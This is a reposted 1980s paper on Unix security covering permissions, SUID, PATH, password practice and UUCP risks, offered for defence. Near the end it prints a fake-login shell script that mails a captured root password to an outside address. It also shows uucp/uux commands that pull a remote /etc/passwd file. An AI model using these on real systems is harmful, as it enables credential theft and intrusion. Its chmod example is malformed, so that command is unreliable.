that it would be a good idea to present this file to the
UNIX-hacker community, to show that hackers don't always
harm systems, but sometimes look for ways to secure flaws
in existing systems. -- Jester Sluggo !!
There are a number of elements that have lead to the popularity of the Unix
operating system in the world today. The most notable factors are its
portability among hardware platforms and the interactive programming
environment that it offers to users. In fact, these elements have had much to
do with the successful evolution of the Unix system in the commercial market
place. (1, 2)
As the Unix system expands further into industry and government, the need to
handle Unix system security will no doubt become imperative. For example, the
US government is committing several million dollars a year for the Unix system
and its supported hardware. (1) The security requirements for the government
are tremendous, and one can only guess at the future needs of security in
industry.
In this paper, we will cover some of the more fundamental security risks in
the Unix system. Discussed are common causes of Unix system compromise in
such areas as file protection, password security, networking and hacker
violations. In our conclusion, we will comment upon ongoing effects in Unix
system security, and their direct influence on the portability of the Unix
operating system.
FILE AND DIRECTORY SECURITY
In the Unix operating system environment, files and directories are organized
in a tree structure with specific access modes. The setting of these modes,
through permission bits (as octal digits), is the basis of Unix system
security. Permission bits determine how users can access files and the type
of access they are allowed. There are three user access modes for all Unix
system files and directories: the owner, the group, and others. Access to
read, write and execute within each of the usertypes is also controlled by
permission bits (Figure 1). Flexibility in file security is convenient, but
it has been criticized as an area of system security compromise.
Permission modes
OWNER GROUP OTHERS
------------------------------------------------------------
rwx : rwx : rwx
------------------------------------------------------------
r=read w=write x=execute
-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam A1 2 May 01 12:01 directory
FIGURE 1. File and directory modes: File shows Bob as the owner, with read
and write permission. Group has write permission, while Others has read and
execute permission. The directory gives a secure directory not readable,
writeable, or executable by Group and Others.
Since the file protection mechanism is so important in the Unix operating
system, it stands to reason that the proper setting of permission bits is
required for overall security. Aside from user ignorance, the most common
area of file compromise has to do with the default setting of permission bits
at file creation. In some systems the default is octal 644, meaning that only
the file owner can write and read to a file, while all others can only read
it. (3) In many "open" environments this may be acceptable. However, in
cases where sensitive data is present, the access for reading by others should
be turned off. The file utility umask does in fact satisfy this requirement.
A suggested setting, umask 027, would enable all permission for the file
owner, disable write permission to the group, and disable permissions for all
others (octal 750). By inserting this umask command in a user .profile or
.login file, the default will be overwritten by the new settings at file
creation.
The CHMOD utility can be used to modify permission settings on files and
directories. Issuing the following command,
chmod u+rwd,g+rw,g-w,u-rwx file
will provide the file with the same protection as the umask above (octal 750).
Permission bits can be relaxed with chmod at a later time, but at least
initially, the file structure can be made secure using a restrictive umask.
By responsible application of such utilities as umask and chmod, users can
enhance file system security. The Unix system, however, restricts the
security defined by the user to only owner, group and others. Thus, the owner
of the file cannot designate file access to specific users. As Kowack and
Healy have pointed out, "The granularity of control that (file security)
mechanisms is often insufficient in practice (...) it is not possible to grant
one user write protection to a directory while granting another read
permission to the same directory. (4) A useful file security file security
extension to the Unix system might be Multics style access control lists.
With access mode vulnerabilities in mind, users should pay close attention
to files and directories under their control, and correct permissions whenever
possible. Even with the design limitations in mode granularity, following a
safe approach will ensure a more secure Unix system file structure.
SUID and SGID
The set user id (suid) and set group id (sgid) identify the user and group
ownership of a file. By setting the suid or sgid permission bits of an
executable file, other users can gain access to the same resources (via the
executable file) as that of the real file's owner.
For Example:
Let Bob's program bob.x be an executable file accessible to others. When Mary
executes bob.x, Mary becomes the new program owner. If during program
execution bob.x requests access to file browse.txt, then Mary must have
previous read or write permission to browse.txt. This would allow Mary and
everyone else total access to the contents of browse.txt, even when she is not
running bob.x. By turning on the suid bit of bob.x, Mary will have the same
access permissions to browse.txt as does the program's real owner, but she
will only have access to browse.txt during the execution of bob.x. Hence, by
incorporating suid or sgid, unwelcome browsers will be prevented from
accessing files like browse.txt.
Although this feature appears to offer substantial access control to Unix
system files, it does have one critical drawback. There is always the chance
that the superuser (system administrator) may have a writable file for others
that is also set with suid. With some modification in the file's code (by a
hacker), an executable file like this would enable a user to become a
superuser. Within a short period of time this violator could completely
compromise system security and make it inaccessible, even to other superusers.
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
root is better than knowing the root password".
To compensate for this security threat, writable suid files should be sought
out and eliminated by the system administrator. Reporting of such files by
normal users is also essential in correcting existing security breaches.
DIRECTORIES
Directory protection is commonly overlooked component of file security in the
Unix system. Many system administrators and users are unaware of the fact,
that "publicly writable directories provide the most opportunities for
compromising the Unix system security" (6). Administrators tend to make these
"open" for users to move around and access public files and utilities. This
can be disastrous, since files and other subdirectories within writable
directories can be moved out and replaced with different versions, even if
contained files are unreadable or unwritable to others. When this happens, an
unscrupulous user or a "password breaker" may supplant a Trojan horse of a
commonly used system utility (e.g. ls, su, mail and so on). For example,
imagine
For example:
Imagine that the /bin directory is publicly writable. The perpetrator could
first remove the old su version (with rm utility) and then include his own
fake su to read the password of users who execute this utility.
Although writable directories can destroy system integrity, readable ones
can be just as damaging. Sometimes files and directories are configured to
permit read access by other. This subtle convenience can lead to unauthorized
disclosure of sensitive data: a serious matter when valuable information is
lost to a business competitor.
As a general rule, therefore, read and write access should be removed from
all but system administrative directories. Execute permission will allow
access to needed files; however, users might explicitly name the file they
wish to use. This adds some protection to unreadable and unwritable
directories. So, programs like lp file.x in an unreadable directory /ddr will
print the contents of file.x, while ls/ddr would not list the contents of that
directory.
PATH VARIABLE
PATH is an environment variable that points to a list of directories, which
are searched when a file is requested by a process. The order of that search
is indicated by the sequence of the listed directories in the PATH name. This
variable is established at user logon and is set up in the users .profile of
.login file.
If a user places the current directory as the first entry in PATH, then
programs in the current directory will be run first. Programs in other
directories with the same name will be ignored. Although file and directory
access is made easier with a PATH variable set up this way, it may expose the
user to pre-existing Trojan horses.
To illustrate this, assume that a Trojan horse, similar to the cat utility,
contains an instruction that imparts access privileges to a perpetrator. The
fake cat is placed in a public directory /usr/his where a user often works.
Now if the user has a PATH variable with the current directory first, and he
enters the cat command while in /usr/his, the fake cat in /usr/his would be
executed but not the system cat located in /bin.
In order to prevent this kind of system violation, the PATH variable must be
correctly set. First, if at all possible, exclude the current directory as
the first entry in the PATH variable and type the full path name when invoking
Unix system commands. This enhances file security, but is more cumbersome to
work with. Second, if the working directory must be included in the PATH
variable, then it should always be listed last. In this way, utilities like
vi, cat, su and ls will be executed first from systems directories like /bin
and /usr/bin before searching the user's working directory.
PASSWORD SECURITY
User authentication in the Unix system is accomplished by personal passwords.
Though passwords offer an additional level of security beyond physical
constraints, they lend themselves to the greatest area of computer system
compromise. Lack of user awareness and responsibility contributes largely to
this form of computer insecurity. This is true of many computer facilities
where password identification, authentication and authorization are required
for the access of resources - and the Unix operating system is no exception.
Password information in many time-sharing systems are kept in restricted
files that are not ordinarily readable by users. The Unix system differs in
this respect, since it allows all users to have read access to the /etc/passwd
file (FIGURE 2) where encrypted passwords and other user information are
stored. Although the Unix system implements a one-way encryption method, and
in most systems a modified version of the data encryption standard (DES),
password breaking methods are known. Among these methods, brute-force attacks
are generally the least effective, yet techniques involving the use of
heuristics (good guesses and knowledge about passwords) tend to be successful.
For example, the /etc/passwd file contains such useful information as the
login name and comments fields. Login names are especially rewarding to the
"password breaker" since many users will use login variants for passwords
(backward spelling, the appending of a single digit etc.). The comment field
often contains items such as surname, given name, address, telephone number,
project name and so on. To quote Morris and Grampp (7) in their landmark
paper on Unix system security:
[in the case of logins]
The authors made a survey of several dozen local machines, using as trial
passwords a collection of the 20 most common female first names, each
followed by a single digit. The total number of passwords tried was,
therefore, 200. At least one of these 200 passwords turned out to be a
valid password on every machine surveyed.
[as for comment fields]
(...) if an intruder knows something about the people using a machine, a
whole new set of candidates is available. Family and friend's names, auto
registration numbers, hobbies, and pets are particularly productive
categories to try interactively in the unlikely event that a purely
mechanical scan of the password file turns out to be disappointing.
Thus, given a persistent system violator, there is a strong evidence, that he
will find some information about users in the /etc/passwd file. With this in
mind, it is obvious that a password file should be unreadable to everyone
except those in charge of system administration.
root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin
FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms.
Resolution of the /etc/passwd file's readability does not entirely solve the
basic problem with passwords. Educating users and administrators is necessary
to assure proper password utilization. First, "good passwords are those that
are at least six characters long, aren't based on personal information, and
have some non-alphabetic (especially control) characters in them: 4score,
my_name, luv2run" (8). Secondly, passwords should be changed periodically but
users should avoid alternating between two passwords. Different passwords for
different machines and files will aid in protecting sensitive information.
Finally, passwords should never be available to unauthorized users. Reduction
of user ignorance about poor password choice will inevitably make a system
more secure.
NETWORK SECURITY
UUCP system
The most common Unix system network is the UUCP system, which is a group of
programs that perform the file transfers and command execution between remote
systems. (3) The problem with the UUCP system is that users on the network
may access other users' files without access permission. As stated by Nowitz
(9),
The uucp system, left unrestricted, will let any outside user execute
commands and copy in/out any file that is readable/writable by a uucp login
user. It is up to the individual sites to be aware of this, and apply the
protections that they feel free are necessary.
This emphasizes the importance of proper implementation by the system
administrator.
There are four UUCP system commands to consider when looking into network
security with the Unix system. The first is uucp, a command used to copy
files between two Unix systems. If uucp is not properly implemented by the
system administrator, any outside user can execute remote commands and copy
files from another login user. If the file name on another system is known,
one could use the uucp command to copy files from that system to their system.
For example:
%uucp system2!/main/src/hisfile myfile
will copy hisfile from system2 in the directory /main/src to the file myfile
in the current local directory. If file transfer restrictions exist on either
system, hisfile would not be sent. If there are no restrictions, any file
could be copied from a remote user - including the password file. The
following would copy the remote system /etc/passwd file to the local file
thanks:
%uucp system2!/etc/passwd thanks
System administrators can address the uucp matter by restricting uucp file
transfers to the directory /user/spool/uucppublic. (8) If one tries to
transfer a file anywhere else, a message will be returned saying "remote
access to path/file denied" and no file transfer will occur.
The second UUCP system command to consider is the uux. Its function is to
execute commands on remote Unix computers. This is called remote command
execution and is most often used to send mail between systems (mail executes
the uux command internally).
The ability to execute a command on another system introduces a serious
security problem if remote command execution is not limited. As an example, a
system should not allow users from another system to perform the following:
%uux "system1!cat</etc/passwd>/usr/spool/uucppublic"
which would cause system1 to send its /etc/passwd file to the system2 uucp
public directory. The user of system2 would now have access to the password
file. Therefore, only a few commands should be allowed to execute remotely.
Often the only command allowed to run uux is rmail, the restricted mail
program.
The third UUCP system function is the uucico (copy in / copy out) program.
It performs the true communication work. Uucp or uux does not actually call
up other systems; instead they are queued and the uucico program initiates the
remote processes. The uucico program uses the file /usr/uucp/USERFILE to
determine what files a remote system may send or receive. Checks for legal
files are the basis for security in USERFILE. Thus the system administrator
should carefully control this file.
In addition, USERFILE controls security between two Unix systems by allowing
a call-back flag to be set. Therefore, some degree of security can be
achieved by requiring a system to check if the remote system is legal before a
call-back occurs.
The last UUCP function is the uuxqt. It controls the remote command
execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
which commands will run in response to a remote execution request. For
example, if one wishes to use the electronic mail feature, then the L.cmd file
will contain the line rmail. Since uuxqt determines what commands will be
allowed to execute remotely, commands which may compromise system security
should not be included in L.cmd.
CALL THE UNIX SYSTEM
In addition to UUCP network commands, one should also be cautious of the cu
command (call the Unix system). Cu permits a remote user to call another
computer system. The problem with cu is that a user on a system with a weak
security can use cu to connect to a more secure system and then install a
Trojan horse on the stronger system. It is apparent that cu should not be
used to go from a weaker system to a stronger one, and it is up to the system
administrator to ensure that this never occurs.
LOCAL AREA NETWORKS
With the increased number of computers operating under the Unix system, some
consideration must be given to local area networks (LANs). Because LANs are
designed to transmit files between computers quickly, security has not been a
priority with many LANs, but there are secure LANs under development. It is
the job of the system manager to investigate security risks when employing
LANs.
OTHER AREAS OF COMPROMISE
There are numerous methods used by hackers to gain entry into computer
systems. In the Unix system, Trojan horses, spoofs and suids are the primary
weapons used by trespassers.
Trojan horses are pieces of code or shell scripts which usually assume the
role of a common utility but when activated by an unsuspecting user performs
some unexpected task for the trespasser. Among the many different Trojan
horses, it is the su masquerade that is the most dangerous to the Unix system.
Recall that the /etc/passwd file is readable to others, and also contains
information about all users - even root users. Consider what a hacker could
do if he were able to read this file and locate a root user with a writable
directory. He might easily plant a fake su that would send the root password
back to the hacker. A Trojan horse similar to this can often be avoided when
various security measures are followed, that is, an etc/passwd file with
limited read access, controlling writable directories, and the PATH variable
properly set.
A spoof is basically a hoax that causes an unsuspecting victim to believe
that a masquerading computer function is actually a real system operation. A
very popular spool in many computer systems is the terminal-login trap. By
displaying a phoney login format, a hacker is able to capture the user's
password.
Imagine that a root user has temporarily deserted his terminal. A hacker
could quickly install a login process like the one described by Morris and
Grampp (7):
echo -n "login:"
read X
stty -echo
echo -n "password:"
read Y
echo ""
stty echo
echo %X%Y|mail outside|hacker&
sleep 1
echo Login incorrect
stty 0>/dev/tty
We see that the password of the root user is mailed to the hacker who has
completely compromised the Unix system. The fake terminal-login acts as if
the user has incorrectly entered the password. It then transfers control over
to the stty process, thereby leaving no trace of its existence.
Prevention of spoofs, like most security hazards, must begin with user
education. But an immediate solution to security is sometimes needed before
education can be effected. As for terminal-login spoofs, there are some
keyboard-locking programs that protect the login session while users are away
from their terminals. (8, 10) These locked programs ignore keyboard-generated
interrupts and wait for the user to enter a password to resume the terminal
session.
Since the suid mode has been previously examined in the password section, we
merely indicate some suid solutions here. First, suid programs should be used
is there are no other alternatives. Unrestrained suids or sgids can lead to
system compromise. Second, a "restricted shell" should be given to a process
that escapes from a suid process to a child process. The reason for this is
that a nonprivileged child process might inherit privileged files from its
parents. Finally, suid files should be writable only by their owners,
otherwise others may have access to overwrite the file contents.
It can be seen that by applying some basic security principles, a user can
avoid Trojan horses, spoofs and inappropriate suids. There are several other
techniques used by hackers to compromise system security, but the use of good
judgement and user education may go far in preventing their occurrence.
CONCLUSION
Throughout this paper we have discussed conventional approaches to Unix system
security by way of practical file management, password protection, and
networking. While it can be argued that user education is paramount in
maintaining Unix system security (11) factors in human error will promote some
degree of system insecurity. Advances in protection mechanisms through
better-written software (12), centralized password control (13) and
identification devices may result in enhanced Unix system security.
The question now asked applies to the future of Unix system operating. Can
existing Unix systems accommodate the security requirements of government and
industry? It appears not, at least for governmental security projects. By
following the Orange Book (14), a government graded classification of secure
computer systems, the Unix system is only as secure as the C1 criterion. A C1
system, which has a low security rating (D being the lowest) provides only
discretionary security protection (DSP) against browsers or non-programmer
users. Clearly this is insufficient as far as defense or proprietary security
is concerned. What is needed are fundamental changes to the Unix security
system. This has been recognized by at least three companies, AT&T, Gould and
Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the
kernel and file system in order to produce a C2 rated Unix operating system.
To achieve this, however, they have had to sacrifice some of the portability
of the Unix system. It is hoped that in the near future a Unix system with an
A1 classification will be realized, though not at the expense of losing its
valued portability.
REFERENCES
1 Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
pp 50-63
2 Waite, M et al. "Unix system V primer" USA (1984)
3 Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
4 Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
Vol 18 (26 September 1984) pp 27-28
5 Farrow, R "Security issues and strategies for users" Unix/World
(April 1986) pp 65-71
6 Farrow, R "Security for superusers, or how to break the Unix system"
Unix/World (May 1986) pp 65-70
7 Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
8 Wood, P H and Kochan, S G "Unix system security" USA (1985)
9 Nowitz, D A "UUCP Implementation description: Unix programmer's manual
Sec. 2" AT&T Bell Laboratories, USA (1984)
10 Thomas, R "Securing your terminal: two approaches" Unix/World
(April 1986) pp 73-76
11 Karpinski, D "Security round table (Part 1)" Unix Review
(October 1984) p 48
12 Karpinski, D "Security round table (Part 2)" Unix Review
(October 1984) p 48
13 Lobel, J "Foiling the system breakers: computer security and access
control" McGraw-Hill, USA (1986)
14 National Computer Security Center "Department of Defense trusted
computer system evaluation criteria" CSC-STD-001-83, USA (1983)
15 Stewart, F "Implementing security under Unix" Systems&Software
(February 1986)
16 Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix for the
Lock TCB" Proceedings of USENIX (1988)
17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
Government System Division, USA (August 1987)
==============================================================================

Some files were not shown because too many files have changed in this diff Show more